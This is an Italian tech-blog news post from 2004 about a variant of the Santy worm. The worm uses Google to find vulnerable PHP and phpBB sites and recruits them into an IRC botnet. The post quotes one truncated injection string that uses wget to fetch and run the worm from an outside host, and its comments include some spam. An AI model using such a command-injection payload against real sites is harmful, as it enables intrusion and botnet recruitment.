Santy strikes back. More Powerful
30 December 2004 - General -
Notizia letta su LevySoft Blog - Fonte: Alground
E? stata scoperta una nuova variante del worm Santy che oltre a phpBB ? in grado di infettare molti altri script in PHP.
Il worm usa il motore di ricerca Google in versione brasiliana per cercare qualsiasi tipo di script PHP, ed una volta analizzato vari URL sovrascrive le variabili con una stringa come la seguente:
‘http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wgetwww.visualcoders.net/spybot.txt;…
Questo consente di scaricare ed eseguire il codice del worm che poi si connette ad un server IRC dove almeno 700 pc zombie sono in attesa di comandi.
E? stato riportato inoltre che ora il worm ? in grado di infettare anche l?ultima versione di phpBB, la 2.0.11, installando due script in perl: un irc bot e il codice del worm.
Che dire, speriamo non sia la prossima piaga per i Wordpressari…
5 commenti
Lascia un commento
Non so se wordpress ? immune a questo worm…quindi occhio agli aggiornamenti ;)
Antonio Troise — 30/12/2004 #
******, spero proprio che il worm di cui sopra la infetti, cos? la smetter? di copiarmi i bannerini.
piuttosto aggiusti il charset, scrignati
Molot?ff — 31/12/2004 #
This is a very beautiful website, I have enjoyed my visit here very much. I’m very honoured to sign in your guestbook. Thanking you for the great work that you are doing here.
Anonymous — 18/1/2005 #
You are invited to visit the pages about…
Anonymous — 24/1/2005 #
You are invited to visit the pages about…
Anonymous — 24/1/2005 #